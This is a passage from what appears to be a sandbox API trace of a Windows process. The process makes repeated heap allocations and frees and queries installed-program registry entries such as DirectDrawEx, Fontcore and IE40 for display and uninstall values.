dwFlags=0x0, lpMem=0x47a0e30 | out: hHeap=0x4780000) returned 1 [0146.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a8f0 | out: hHeap=0x4780000) returned 1 [0146.660] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c00 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ee08 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a49d0 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b70 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798ad0 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798bb0 | out: hHeap=0x4780000) returned 1 [0146.661] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0146.661] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a48b8 [0146.661] RegOpenKeyExW (in: hKey=0x220, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x228) returned 0x0 [0146.662] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e8f8 [0146.662] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a48b8 | out: hHeap=0x4780000) returned 1 [0146.662] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0e58 [0146.662] RegQueryValueExW (in: hKey=0x228, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.662] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e58 | out: hHeap=0x4780000) returned 1 [0146.662] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a09f8 [0146.663] RegOpenKeyExW (in: hKey=0x220, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x22c) returned 0x0 [0146.663] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x8) returned 0x479e898 [0146.663] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a09f8 | out: hHeap=0x4780000) returned 1 [0146.663] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0ac0 [0146.663] RegQueryValueExW (in: hKey=0x22c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.663] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ac0 | out: hHeap=0x4780000) returned 1 [0146.663] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47a4a78 [0146.663] RegQueryValueExW (in: hKey=0x22c, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.664] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4a78 | out: hHeap=0x4780000) returned 1 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x24) returned 0x479a980 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798bb0 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b60 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d90 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2c) returned 0x47a4b58 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0b10 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xc) returned 0x479eca0 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0cf0 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798ad0 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x28) returned 0x479a8f0 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798c90 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798af0 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47a0b88 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x18) returned 0x4798a90 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x14) returned 0x4798b10 [0146.664] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0d18 [0146.664] RegQueryValueExW (in: hKey=0x22c, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.665] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.665] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0db8 [0146.665] RegQueryValueExW (in: hKey=0x22c, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.665] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0db8 | out: hHeap=0x4780000) returned 1 [0146.665] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47a0bb0 [0146.665] RegQueryValueExW (in: hKey=0x22c, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.665] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bb0 | out: hHeap=0x4780000) returned 1 [0146.665] RegQueryValueExW (in: hKey=0x22c, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.665] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.665] RegQueryValueExW (in: hKey=0x22c, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7e8 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8a8 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7d8 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e858 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e798 | out: hHeap=0x4780000) returned 1 [0146.666] RegQueryValueExW (in: hKey=0x22c, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.666] RegQueryValueExW (in: hKey=0x22c, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x9, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a980 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798bb0 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b88 | out: hHeap=0x4780000) returned 1 [0146.666] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.714] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b60 | out: hHeap=0x4780000) returned 1 [0146.714] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a8f0 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b10 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479eca0 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4b58 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798ad0 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798c90 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.715] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b10 | out: hHeap=0x4780000) returned 1 [0146.715] RegOpenKeyExW (in: hKey=0x220, lpSubKey="DXM_Runtime", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x230) returned 0x0 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c78 | out: hHeap=0x4780000) returned 1 [0146.716] RegQueryValueExW (in: hKey=0x230, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x9, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ac0 | out: hHeap=0x4780000) returned 1 [0146.716] RegQueryValueExW (in: hKey=0x230, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x9, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a47d8 | out: hHeap=0x4780000) returned 1 [0146.716] RegQueryValueExW (in: hKey=0x230, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b88 | out: hHeap=0x4780000) returned 1 [0146.716] RegQueryValueExW (in: hKey=0x230, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b88 | out: hHeap=0x4780000) returned 1 [0146.716] RegQueryValueExW (in: hKey=0x230, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d40 | out: hHeap=0x4780000) returned 1 [0146.716] RegQueryValueExW (in: hKey=0x230, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0a98 | out: hHeap=0x4780000) returned 1 [0146.716] RegQueryValueExW (in: hKey=0x230, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b10 | out: hHeap=0x4780000) returned 1 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e878 | out: hHeap=0x4780000) returned 1 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8b8 | out: hHeap=0x4780000) returned 1 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7f8 | out: hHeap=0x4780000) returned 1 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e908 | out: hHeap=0x4780000) returned 1 [0146.716] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e858 | out: hHeap=0x4780000) returned 1 [0146.717] RegQueryValueExW (in: hKey=0x230, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c00 | out: hHeap=0x4780000) returned 1 [0146.717] RegQueryValueExW (in: hKey=0x230, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x18, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a6e0 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0db8 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bd8 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bb0 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a7d0 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0b60 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ec58 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4880 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798ad0 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b30 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b10 | out: hHeap=0x4780000) returned 1 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b70 | out: hHeap=0x4780000) returned 1 [0146.717] RegOpenKeyExW (in: hKey=0x220, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x234) returned 0x0 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c78 | out: hHeap=0x4780000) returned 1 [0146.717] RegQueryValueExW (in: hKey=0x234, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x18, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e58 | out: hHeap=0x4780000) returned 1 [0146.717] RegQueryValueExW (in: hKey=0x234, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x18, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.717] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4998 | out: hHeap=0x4780000) returned 1 [0146.718] RegQueryValueExW (in: hKey=0x234, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ac0 | out: hHeap=0x4780000) returned 1 [0146.718] RegQueryValueExW (in: hKey=0x234, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0bd8 | out: hHeap=0x4780000) returned 1 [0146.718] RegQueryValueExW (in: hKey=0x234, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0a20 | out: hHeap=0x4780000) returned 1 [0146.718] RegQueryValueExW (in: hKey=0x234, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c50 | out: hHeap=0x4780000) returned 1 [0146.718] RegQueryValueExW (in: hKey=0x234, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0db8 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7e8 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8c8 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e7c8 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8b8 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e8a8 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e878 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0146.718] RegQueryValueExW (in: hKey=0x234, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e80 | out: hHeap=0x4780000) returned 1 [0146.718] RegQueryValueExW (in: hKey=0x234, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x17, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479aa10 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798b10 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e58 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c78 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e30 | out: hHeap=0x4780000) returned 1 [0146.718] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479a8c0 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d90 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479ec28 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a4c70 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798ad0 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798cd0 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798a90 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798bf0 | out: hHeap=0x4780000) returned 1 [0146.719] RegOpenKeyExW (in: hKey=0x220, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x238) returned 0x0 [0146.719] RegQueryValueExW (in: hKey=0x238, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x17, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0cf0 | out: hHeap=0x4780000) returned 1 [0146.719] RegQueryValueExW (in: hKey=0x238, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x17, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a48b8 | out: hHeap=0x4780000) returned 1 [0146.719] RegQueryValueExW (in: hKey=0x238, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e08 | out: hHeap=0x4780000) returned 1 [0146.719] RegQueryValueExW (in: hKey=0x238, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0e80 | out: hHeap=0x4780000) returned 1 [0146.719] RegQueryValueExW (in: hKey=0x238, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0ac0 | out: hHeap=0x4780000) returned 1 [0146.719] RegQueryValueExW (in: hKey=0x238, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0c00 | out: hHeap=0x4780000) returned 1 [0146.719] RegQueryValueExW (in: hKey=0x238, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.719] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a0d18 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e868 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e798 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x479e768 | out: hHeap=0x4780000) returned 1 [0146.720] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 